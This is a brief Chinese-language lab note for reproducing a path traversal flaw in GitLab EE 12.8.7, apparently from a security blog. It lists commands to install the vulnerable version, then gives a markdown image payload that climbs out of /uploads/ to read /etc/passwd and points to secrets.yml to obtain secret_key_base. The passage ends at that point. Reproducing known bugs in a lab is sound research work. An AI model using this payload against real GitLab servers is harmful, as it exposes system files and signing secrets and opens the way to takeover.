參考:
https://hackerone.com/reports/827052
受影響版本下載:
https://packages.gitlab.com/gitlab/gitlab-ee/packages/ubuntu/xenial/gitlab-ee_12.8.7-ee.0_amd64.deb
wget --content-disposition https://packages.gitlab.com/gitlab/gitlab-ee/packages/ubuntu/xenial/gitlab-ee_12.8.7-ee.0_amd64.deb/download.deb
sudo dpkg -i
然後啓動:
sudo gitlab-ctl reconfigure
查看gitlab各個模塊狀態:
sudo gitlab-ctl status
sudo gitlab-ctl tail gitlab-rails
參考:
https://www.iteye.com/blog/hai0378-2366869
Demo
payload:
![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)
/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
拿到secret_key_base
: